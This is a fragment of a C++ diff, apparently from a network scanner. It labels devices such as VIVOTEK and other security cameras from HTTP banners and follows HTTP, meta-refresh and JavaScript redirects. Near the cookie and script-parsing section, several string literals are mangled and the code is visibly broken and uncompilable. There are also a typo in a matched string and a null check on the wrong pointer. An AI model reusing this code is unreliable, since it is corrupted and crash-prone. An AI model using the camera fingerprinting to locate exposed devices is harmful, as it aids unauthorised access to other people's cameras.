strcpy(ps->headr, "[VIVOTEK camera detected?]"); }; + if(strstri(str, "$lock extended") != NULL) + { strcpy(ps->headr, "[DChub detected.]"); strcpy(ps->path, "/"); return 0; }; + if(strstri(str, "top.htm?currenttime") != NULL + || strstri(str, "top.htm?") != NULL + ) strcat(finalstr, " [?][SecCam detected]"); +#pragma endregion + +#pragma region 302 Redirects + if( strstri(str, "http/1.0 301") != NULL || strstri(str, "http/1.1 301") != NULL + || strstri(str, "http/1.0 302") != NULL || strstri(str, "http/1.1 302") != NULL + || strstri(str, "http/1.0 307") != NULL || strstri(str, "http/1.1 307") != NULL + || strstri(str, "303 see other") != NULL + ) + { + char *temp = NULL, *temp2 = NULL; + int res = 127; + if(strstri(str, "location: ") != NULL) + { + temp = strstri(str, "location: "); + if( strstr(temp + 10, "\r\n") != NULL ) temp2 = strstr(temp + 10, "\r\n"); + else if( strstr(temp + 10, "\n") != NULL ) temp2 = strstr(temp + 10, "\n"); + + if(temp2 != NULL) + { + res = temp2 - temp - 10; + char newLoc[256] = {0}; + char *tmp = strstr(temp, "/"); + + if(tmp != NULL) + { + strncat(newLoc, temp + 10, res < 256 ? res : 255); + if(strstri(newLoc, "http://") == NULL && strstri(newLoc, "https://") == NULL) + { + if(newLoc[0] != '.') + { + if(newLoc[0] != '/') + { + int sz = strlen(newLoc); + if (sz > 255) + { + stt->doEmitionRedFoundData("Huge redirect string detected! " + QString(ip) + ":" + QString::number(port)); + sz = 255; + }; + char tnewLoc[256] = {0}; + strcpy(tnewLoc, "/"); + strncat(tnewLoc, newLoc, sz); + strncpy(newLoc, tnewLoc, sz); + }; + }; + }; + redirectStr = std::string(newLoc); + if(std::find(redirStrLst->begin(), redirStrLst->end(), redirectStr) == redirStrLst->end()) + { + redirStrLst->push_back(redirectStr); + redirectReconnect(ps->cookie, ip, port, newLoc, l, ps, redirStrLst, rBuff); + }; + return -2; + }; + }; + } + else if(strstri(str, "location:") != NULL) + { + temp = strstri(str, "location:"); + if( strstr(temp + 9, "\r\n") != NULL ) temp2 = strstr(temp + 9, "\r\n"); + else if( strstr(temp + 9, "\n") != NULL ) temp2 = strstr(temp + 9, "\n"); + + if(temp != NULL) + { + res = temp2 - temp - 9; + char newLoc[128] = {0}; + char *tmp = strstr(temp, "/"); + + if(tmp != NULL) + { + strncat(newLoc, temp + 9, res < 128 ? res : 127); + redirectStr = std::string(newLoc); + if(std::find(redirStrLst->begin(), redirStrLst->end(), redirectStr) == redirStrLst->end()) + { + redirStrLst->push_back(redirectStr); + redirectReconnect(ps->cookie, ip, port, newLoc, l, ps, redirStrLst, rBuff); + }; + return -2; + }; + }; + }; + }; + if(strstri(str, "http-equiv=\"refresh\"") != NULL + || strstri(str, "http-equiv=refresh") != NULL + || strstri(str, "http-equiv='refresh'") != NULL + ) + { + char *temp = NULL; + char *strTmp = NULL; + + if(strstri(str, "http-equiv=\"refresh\"") != NULL) strTmp = strstri(str, "ttp-equiv=\"refresh\""); + else if(strstri(str, "http-equiv=refresh") != NULL) strTmp = strstri(str, "http-equiv=refresh"); + else if(strstri(str, "http-equiv='refresh'") != NULL) strTmp = strstri(str, "http-equiv='refresh'"); + + if(strstri(strTmp, "url=") != NULL ) + { + if((int)(strstri(strTmp, "url=") - strTmp) < 100) + { + temp = strstri(strTmp, "url="); + + char *temp1 = NULL, *temp2 = NULL, temp3[128] = {0}; + int sz = 0; + + if(temp[4] == '"' || temp[4] == '\'' || temp[4] == ' ' || temp[4] == '\n' || temp[4] == '\r') + { + temp2 = _findFirst(temp + 6, " \n>\"'"); + if(temp2 != NULL) + { + sz = (int)(temp2 - temp) - 5; + strncpy(temp3, (char*)(temp + 5), (sz < 128 ? sz : 127)); + }; + } + else + { + temp2 = _findFirst(temp + 4, " \n>\"'"); + if(temp2 != NULL) + { + sz = (int)(temp2 - temp) - 4; + strncpy(temp3, (char*)(temp + 4), sz < 128 ? sz : 127); + }; + }; + if(strstri(temp3, "http://") == NULL && strstri(temp3, "https://") == NULL) + { + if(temp3[0] != '.') + { + if(temp3[0] != '/') + { + char temp4[128] = {0}; + strcpy(temp4, "/"); + strncat(temp4, temp3, 127); + strncpy(temp3, temp4, 128); + }; + }; + }; + redirectStr = std::string(temp3); + if(std::find(redirStrLst->begin(), redirStrLst->end(), redirectStr) == redirStrLst->end()) + { + redirStrLst->push_back(redirectStr); + redirectReconnect(ps->cookie, ip, port, temp3, l, ps, redirStrLst, rBuff); + }; + strcat(ps->headr, " "); + return -2; + }; + strcat(ps->headr, finalstr); + strcat(ps->headr, " "); + return 0; + }; + }; + if(strstri(str, "cookie, sizeof(ps->cookie)); + _getJSCookie(ps->cookie, str, ip, port); + }; + char *ptr1 = strstri(str, ""); + if(ptr2 != NULL) + { + int sz = ptr2 - ptr1; + char *scriptContainer = new char[sz + 1]; + ZeroMemory(scriptContainer, sz + 1); + strncpy(scriptContainer, ptr1, sz); + memset(scriptContainer + sz, '\0', 1); + + ZeroMemory(linkPtr, 512); + if(strstri(scriptContainer, "location.href") != NULL) _getLinkFromJSLocation(linkPtr, scriptContainer, "location.href", ip, port); + else if(strstri(scriptContainer, "location.replace") != NULL) _getLinkFromJSLocation(linkPtr, scriptContainer, "location.replace", ip, port); + else if(strstri(scriptContainer, "location.reload") != NULL) strcpy(linkPtr, "/"); + else if(strstri(scriptContainer, "location") != NULL) _getLinkFromJSLocation(linkPtr, scriptContainer, "location", ip, port); + + if(strlen(linkPtr) != 0) + { + redirectStr = std::string(linkPtr); + if(std::find(redirStrLst->begin(), redirStrLst->end(), redirectStr) == redirStrLst->end()) + { + redirStrLst->push_back(redirectStr); + redirectReconnect(ps->cookie, ip, port, linkPtr, l, ps, redirStrLst, rBuff); + }; + }; + delete []scriptContainer; + if(ps->flag >= 17 || ps->flag == 11 || ps->flag == 12 + || ps->flag == 13 || ps->flag == 14 || ps->flag == 1 + || ps->flag == 10 + ) + return -2; + else if(ps->flag == -1) return -1; + } + else + { + strcat(ps->headr, "[Cannot retrieve \"